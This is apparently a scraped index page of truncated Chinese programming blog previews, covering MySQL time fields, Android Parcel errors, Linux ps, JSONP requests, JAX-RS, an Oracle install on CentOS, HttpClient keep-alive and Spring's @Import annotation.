MySQL时间字段究竟使用INT还是DateTime？ dcj3sjt126com mysql
环境：Windows XPPHP Version 5.2.9MySQL Server 5.1 第一步、创建一个表date_test（非定长、int时间） CREATE TABLE `test`.`date_test` (`id` INT NOT NULL AUTO_INCREMENT ,`start_time` INT NOT NULL ,`some_content`
Parcel: unable to marshal value dcj3sjt126com marshal
在两个activity直接传递List<xxInfo>时，出现Parcel: unable to marshal value异常。在MainActivity页面（MainActivity页面向NextActivity页面传递一个List<xxInfo>）： Intent intent = new Intent(this, Next
linux进程的查看上（ps） eksliang linux ps linux ps -l linux ps aux
ps:将某个时间点的进程运行情况选取下来转载请出自出处：http://eksliang.iteye.com/admin/blogs/2119469 http://eksliang.iteye.com ps 这个命令的man page 不是很好查阅，因为很多不同的Unix都使用这儿ps来查阅进程的状态，为了要符合不同版本的需求，所以这个
为什么第三方应用能早于System的app启动 gqdy365 System
Android应用的启动顺序网上有一大堆资料可以查阅了，这里就不细述了，这里不阐述ROM启动还有bootloader，软件启动的大致流程应该是启动kernel -> 运行servicemanager 把一些native的服务用命令启动起来（包括wifi, power, rild, surfaceflinger, mediaserver等等）-> 启动Dalivk中的第一个进程Zygot
App Framework发送JSONP请求(3) hw1287789687 jsonp 跨域请求发送jsonp ajax请求越狱请求
App Framework 中如何发送JSONP请求呢? 使用jsonp,详情请参考:http://json-p.org/ 如何发送Ajax请求呢? (1)登录 /*** * 会员登录 * @param username * @param password */ var user_login=function(username,password){ // aler
发福利，整理了一份关于“资源汇总”的汇总 justjavac 资源
觉得有用的话，可以去github关注：https://github.com/justjavac/awesome-awesomeness-zh_CN 通用 free-programming-books-zh_CN 免费的计算机编程类中文书籍精彩博客集合 hacke2/hacke2.github.io#2 ResumeSample 程序员简历
用 Java 技术创建 RESTful Web 服务 macroli java 编程 Web REST
转载：http://www.ibm.com/developerworks/cn/web/wa-jaxrs/ JAX-RS (JSR-311) 【 Java API for RESTful Web Services 】是一种 Java™ API，可使 Java Restful 服务的开发变得迅速而轻松。这个 API 提供了一种基于注释的模型来描述分布式资源。注释被用来提供资源的位
CentOS6.5-x86_64位下oracle11g的安装详细步骤及注意事项超声波 oracle linux
前言：这两天项目要上线了，由我负责往服务器部署整个项目，因此首先要往服务器安装oracle，服务器本身是CentOS6.5的64位系统，安装的数据库版本是11g，在整个的安装过程中碰到很多的坑，不过最后还是通过各种途径解决并成功装上了。转别写篇博客来记录完整的安装过程以及在整个过程中的注意事项。希望对以后那些刚刚接触的菜鸟们能起到一定的帮助作用。安装过程中可能遇到的问题（注
HttpClient 4.3 设置keeplive 和 timeout 的方法 supben httpclient
ConnectionKeepAliveStrategy kaStrategy = new DefaultConnectionKeepAliveStrategy() { @Override public long getKeepAliveDuration(HttpResponse response, HttpContext context) { long keepAlive
Spring 4.2新特性-@Import注解的升级 wiselyman spring 4
3.1 @Import @Import注解在4.2之前只支持导入配置类在4.2,@Import注解支持导入普通的java类,并将其声明成一个bean 3.2 示例演示java类 package com.wisely.spring4_2.imp; public class DemoService { public void doSomethin